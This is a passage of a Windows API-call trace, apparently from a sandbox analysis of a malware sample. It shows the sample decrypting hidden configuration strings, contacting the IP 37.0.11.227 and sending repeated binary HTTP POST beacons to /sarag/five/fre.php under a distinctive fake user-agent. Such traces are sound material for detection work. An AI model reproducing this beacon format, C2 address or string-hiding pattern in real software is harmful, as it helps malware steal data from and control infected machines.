ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0287.819] GetProcessHeap () returned 0x690000 [0287.819] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0287.819] GetProcessHeap () returned 0x690000 [0287.819] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0287.822] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0287.822] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0287.822] GetProcessHeap () returned 0x690000 [0287.822] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6aff80 [0287.822] GetProcessHeap () returned 0x690000 [0287.823] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0287.823] GetProcessHeap () returned 0x690000 [0287.823] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0287.823] GetProcessHeap () returned 0x690000 [0287.823] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0287.824] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0287.824] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0287.824] GetProcessHeap () returned 0x690000 [0287.824] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0287.824] GetProcessHeap () returned 0x690000 [0287.825] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0287.825] send (s=0x93c, buf=0x6ad508*, len=242, flags=0) returned 242 [0287.826] send (s=0x93c, buf=0x6aba40*, len=159, flags=0) returned 159 [0287.826] GetProcessHeap () returned 0x690000 [0287.826] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0287.826] recv (in: s=0x93c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0287.938] GetProcessHeap () returned 0x690000 [0287.939] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0287.939] GetProcessHeap () returned 0x690000 [0287.939] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0287.939] GetProcessHeap () returned 0x690000 [0287.940] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aff80 | out: hHeap=0x690000) returned 1 [0287.940] GetProcessHeap () returned 0x690000 [0287.940] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0287.940] closesocket (s=0x93c) returned 0 [0287.941] GetProcessHeap () returned 0x690000 [0287.941] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0287.941] GetProcessHeap () returned 0x690000 [0287.941] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0287.941] GetProcessHeap () returned 0x690000 [0287.941] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0287.941] GetProcessHeap () returned 0x690000 [0287.942] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0287.942] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x179c) returned 0x93c [0287.943] Sleep (dwMilliseconds=0xea60) [0287.946] GetProcessHeap () returned 0x690000 [0287.947] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0287.948] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.948] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0287.955] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.959] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0287.969] GetProcessHeap () returned 0x690000 [0287.969] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0287.969] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.970] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d028) returned 1 [0287.971] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.971] CryptSetKeyParam (hKey=0x69d028, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0287.972] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.972] CryptSetKeyParam (hKey=0x69d028, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0287.972] GetProcessHeap () returned 0x690000 [0287.973] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0287.973] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.974] CryptDecrypt (in: hKey=0x69d028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0287.975] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.975] CryptDestroyKey (hKey=0x69d028) returned 1 [0287.976] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.976] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0287.976] GetProcessHeap () returned 0x690000 [0287.976] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0287.977] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0287.977] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0288.022] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0288.023] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0288.024] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0288.024] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0288.025] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0288.025] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0288.025] GetProcessHeap () returned 0x690000 [0288.025] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0288.025] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0288.026] GetProcessHeap () returned 0x690000 [0288.026] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0288.026] GetProcessHeap () returned 0x690000 [0288.027] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0288.027] GetProcessHeap () returned 0x690000 [0288.028] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0288.028] GetProcessHeap () returned 0x690000 [0288.028] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0288.029] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.030] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0288.038] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.038] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0288.047] GetProcessHeap () returned 0x690000 [0288.047] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0288.047] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.048] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0288.049] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.049] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0288.050] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.050] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0288.050] GetProcessHeap () returned 0x690000 [0288.050] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0288.051] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.052] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0288.053] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.053] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0288.054] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.057] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0288.057] GetProcessHeap () returned 0x690000 [0288.057] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0288.058] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0288.058] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0288.059] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0288.060] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0288.060] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0288.061] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0288.061] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0288.062] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0288.062] GetProcessHeap () returned 0x690000 [0288.062] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0288.062] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0288.062] GetProcessHeap () returned 0x690000 [0288.062] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab490 [0288.062] socket (af=2, type=1, protocol=6) returned 0x940 [0288.062] connect (s=0x940, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0288.086] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0288.086] GetProcessHeap () returned 0x690000 [0288.086] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0288.086] GetProcessHeap () returned 0x690000 [0288.086] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0288.087] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0288.090] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0288.090] GetProcessHeap () returned 0x690000 [0288.090] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af800 [0288.090] GetProcessHeap () returned 0x690000 [0288.091] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0288.091] GetProcessHeap () returned 0x690000 [0288.091] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0288.091] GetProcessHeap () returned 0x690000 [0288.091] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0288.092] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0288.093] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0288.093] GetProcessHeap () returned 0x690000 [0288.093] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0288.093] GetProcessHeap () returned 0x690000 [0288.093] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0288.093] send (s=0x940, buf=0x6ad508*, len=242, flags=0) returned 242 [0288.094] send (s=0x940, buf=0x6aba40*, len=159, flags=0) returned 159 [0288.094] GetProcessHeap () returned 0x690000 [0288.094] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0288.094] recv (in: s=0x940, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0288.164] GetProcessHeap () returned 0x690000 [0288.164] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0288.164] GetProcessHeap () returned 0x690000 [0288.164] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0288.164] GetProcessHeap () returned 0x690000 [0288.165] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af800 | out: hHeap=0x690000) returned 1 [0288.167] GetProcessHeap () returned 0x690000 [0288.167] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0288.167] closesocket (s=0x940) returned 0 [0288.168] GetProcessHeap () returned 0x690000 [0288.168] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab490 | out: hHeap=0x690000) returned 1 [0288.168] GetProcessHeap () returned 0x690000 [0288.168] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0288.168] GetProcessHeap () returned 0x690000 [0288.168] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0288.168] GetProcessHeap () returned 0x690000 [0288.169] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0288.169] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17a4) returned 0x940 [0288.170] Sleep (dwMilliseconds=0xea60) [0288.171] GetProcessHeap () returned 0x690000 [0288.171] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0288.172] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.173] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0288.179] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.179] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0288.185] GetProcessHeap () returned 0x690000 [0288.185] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0288.185] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.186] CryptImportKey (in: hProv=0x6af100, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0288.186] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.187] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0288.187] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.188] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0288.188] GetProcessHeap () returned 0x690000 [0288.188] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0288.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.238] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0288.239] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.239] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0288.240] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.240] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0288.240] GetProcessHeap () returned 0x690000 [0288.240] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0288.243] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0288.243] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0288.244] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0288.244] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0288.245] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0288.246] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0288.246] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0288.247] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0288.247] GetProcessHeap () returned 0x690000 [0288.247] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0288.247] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0288.247] GetProcessHeap () returned 0x690000 [0288.248] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0288.248] GetProcessHeap () returned 0x690000 [0288.248] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0288.248] GetProcessHeap () returned 0x690000 [0288.249] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0288.249] GetProcessHeap () returned 0x690000 [0288.249] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0288.250] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.260] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0288.264] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.265] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0288.291] GetProcessHeap () returned 0x690000 [0288.291] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0288.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.293] CryptImportKey (in: hProv=0x6af100, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0288.293] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.294] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0288.294] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.294] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0288.294] GetProcessHeap () returned 0x690000 [0288.295] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0288.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.296] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0288.296] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.296] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0288.297] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0288.297] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0288.297] GetProcessHeap () returned 0x690000 [0288.297] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0288.298] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0288.298] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0288.299] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0288.299] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0288.300] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0288.300] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0288.301] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0288.303] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0288.303] GetProcessHeap () returned 0x690000 [0288.303] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0288.303] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0288.303] GetProcessHeap () returned 0x690000 [0288.303] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0288.303] socket (af=2, type=1, protocol=6) returned 0x944 [0288.304] connect (s=0x944, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0288.328] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0288.328] GetProcessHeap () returned 0x690000 [0288.328] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0288.328] GetProcessHeap () returned 0x690000 [0288.328] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0288.329] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0288.330] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0288.330] GetProcessHeap () returned 0x690000 [0288.330] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0280 [0288.330] GetProcessHeap () returned 0x690000 [0288.331] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0288.331] GetProcessHeap () returned 0x690000 [0288.331] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0288.331] GetProcessHeap () returned 